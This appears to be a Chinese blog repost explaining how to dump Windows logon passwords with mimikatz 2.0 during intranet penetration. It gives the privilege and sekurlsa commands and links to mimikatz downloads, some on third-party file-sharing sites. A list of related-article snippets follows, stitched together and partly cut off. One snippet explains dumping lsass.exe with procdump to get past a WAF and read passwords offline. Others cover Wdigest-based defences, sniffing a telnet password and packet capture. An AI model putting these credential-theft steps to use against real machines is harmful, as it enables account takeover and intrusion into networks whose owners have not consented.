mimikatz2.0抓取WINDOWS密码

看吾爱的,刚好问同事说这个也用过,以后内网渗透的话比较方便

http://www.52pojie.cn/thread-264895-1-1.html

==========================

2.0版本的只需要两条命令就可以了,比以前版本的更简单了。

第一条:privilege::debug
                //提升权限
第二条:sekurlsa::logonpasswords

//抓取密码

miimkatz还可以抓远程主机的

输入 XX:: 可以查看工具支持那些命名

作者博客地址http://blog.gentilkiwi.com/

mimikatz2.0神器下载地址: https://github.com/gentilkiwi/mimikatz/releases/latest

作者开放了源码,可以自己下载源码编译~

应各位亲的要求已经上传到国内网盘,

编译后成品下载:http://pan.baidu.com/s/1bngsb2f

源码下载:    http://pan.baidu.com/s/1gdGbGlH

时间: 2024-11-04 19:26:07

mimikatz2.0抓取WINDOWS密码的相关文章

mimikaz在waf下抓取windows明文密码

当拿到目标服务器时,我们一般会使用神器mimkaz来抓取目标服务器的明文密码,但是如果目标服务器配置了waf,mimikaz无法抓取时,这是可以将存有帐号密码的dmp文件下载到本地来使用mimikaz抓取. 实现自己搭建一个与目标机器同样的系统环境.然后利用如下命令来下载dmp文件; procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp 这个procdump.exe是微软工具包中的一个工具,不会被杀毒ban了,将该dmp下

用批处理抓取Windows版本信息

[1]Python 环境下比较简单,调用platform 模块即可 [2]没有Python 情况下,可以用ver 命令实现. >ver Microsoft Windows [Version 10.0.16299.967] <a>自动化用简单的Batch脚本[不推荐] :: ------------------------------------- :: Check Windows Version :: 5.0 = W2000 :: 5.1 = XP :: 5.2 = Server 200

从网页上抓取Windows补丁信息然后整型输出(Python)

Powershell实现:http://www.cnblogs.com/IvanChen/p/4488246.html 今天通过Python实现: # coding=utf-8 import re import requests import csv import sys from lxml import etree reload(sys) sys.setdefaultencoding('utf8') summaryurl = 'https://technet.microsoft.com/en-

wireshark抓取telnet密码

过滤telnet包并追踪流 显示和保存数据为转换为Hex转储 ANSI码7f对应del 故得到密码为Password: {bddf0df2f24f248a} 原文地址:https://www.cnblogs.com/wanao/p/10922286.html

关于Windows系列密码抓取

     首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络)      首先介绍一下windows密码Hash:      早期SMB协议在网络上传输明文口令.后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解.微软提出了WindowsNT挑战/响应验证机制,称之为NTLM.现在已经有了更新的NTLMv2以及Kerberos验证体系.Windows加密过的密码口令,我们称之为hash(

明文密码和散列值抓取防范方法

一.单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能.windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码.对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码. 通过查看注册表键值,可以判断Wdigest功能状态.如果该项值为“1”则为开启,即可以获取明文密码,如果该项值为“0”,则明文密码不会出现在内存中.开启和关闭Wd

PHP抓取网页图片的实例

<?php /**   * 抓取网站上的图片到本地  * PS: 如果网页中的图片路径不是绝对路径,就无法抓取   */   set_time_limit(0);//抓取不受时间限制      $URL='http://image.baidu.com/';//任意网址      get_pic($URL);      function get_pic($pic_url) {       //获取图片二进制流       $data=CurlGet($pic_url);       /*利用正则表

[转]使用tcpdump抓取HTTP包

tcpdump -XvvennSs 0 -i eth0 tcp[20:2]=0x4745 or tcp[20:2]=0x4854 0x4745 为"GET"前两个字母"GE",0x4854 为"HTTP"前两个字母"HT". 输出到文件: sudo tcpdump  -XvvennSs 0 -i rvi0 tcp[20:2]=0x4745 or tcp[20:2]=0x4854 >> ~/out.pcapng tc

一站式学习Wireshark(八):应用Wireshark过滤条件抓取特定数据流

应用抓包过滤,选择Capture | Options,扩展窗口查看到Capture Filter栏.双击选定的接口,如下图所示,弹出Edit Interface Settints窗口. 下图显示了Edit Interface Settings窗口,这里可以设置抓包过滤条件.如果你确知抓包过滤条件的语法,直接在Capture Filter区域输入.在输入错误时,Wireshark通过红色背景区域表明无法处理过滤条件.最有可能的情况是,过滤条件中含有输入错误,或是使用了display filter的